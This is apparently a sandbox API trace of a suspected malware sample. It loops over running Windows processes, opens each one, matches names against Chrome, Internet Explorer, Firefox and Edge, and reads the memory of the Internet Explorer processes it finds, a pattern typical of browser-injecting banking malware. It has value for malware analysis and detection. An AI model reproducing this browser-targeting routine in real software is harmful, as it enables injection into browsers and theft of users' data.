	[0204.418] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0204.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.418] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.419] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0204.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.419] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0204.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2910
	[0204.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.420] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0204.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.421] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.421] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0204.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.422] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0204.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2914
	[0204.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.427] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0204.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.428] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.428] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0204.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.429] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.429] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0204.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2918
	[0204.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.430] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0204.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.430] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.431] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0204.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.431] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.432] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0204.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x291c
	[0204.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.433] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0204.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.433] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.434] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0204.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.434] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2920
	[0204.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.435] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.436] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.436] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.436] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.436] NtQueryInformationProcess (in: ProcessHandle=0x2920, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.436] ReadProcessMemory (in: hProcess=0x2920, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.436] ReadProcessMemory (in: hProcess=0x2920, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.437] ReadProcessMemory (in: hProcess=0x2920, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.437] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2924
	[0204.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.438] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.438] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.438] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.439] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.439] NtQueryInformationProcess (in: ProcessHandle=0x2924, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.439] ReadProcessMemory (in: hProcess=0x2924, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.439] ReadProcessMemory (in: hProcess=0x2924, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.439] ReadProcessMemory (in: hProcess=0x2924, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.439] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2928
	[0204.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.440] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.441] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.441] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.441] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.441] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0204.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x292c
	[0204.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.442] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0204.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.443] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.443] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0204.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.443] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2930
	[0204.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.444] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.445] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.445] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.445] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.446] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2934
	[0204.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.447] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.447] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.448] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.448] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.448] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0204.449] CloseHandle (hObject=0x188) returned 1
	[0204.449] Sleep (dwMilliseconds=0x64) 
	[0204.549] GetCurrentProcessId () returned 0x110
	[0204.550] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0204.554] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0204.555] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0204.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0204.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2938
	[0204.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.558] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.558] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.559] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.559] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.560] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x293c
	[0204.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.561] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.561] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.562] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.562] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.562] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0204.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2940
	[0204.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.563] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0204.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.563] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.564] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0204.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.564] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2944
	[0204.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.565] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.566] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.566] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.566] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.566] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0204.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2948
	[0204.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.567] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0204.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.567] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.568] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0204.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.568] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0204.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x294c
	[0204.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.569] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0204.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.569] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.570] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0204.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.570] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0204.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2950
	[0204.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.571] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0204.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.571] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.572] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0204.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.572] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0204.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2954
	[0204.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.573] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.573] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.573] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.574] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.574] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2958
	[0204.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.575] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.576] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x295c
	[0204.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.577] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.577] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.577] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.577] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2960
	[0204.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.578] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.579] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.580] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
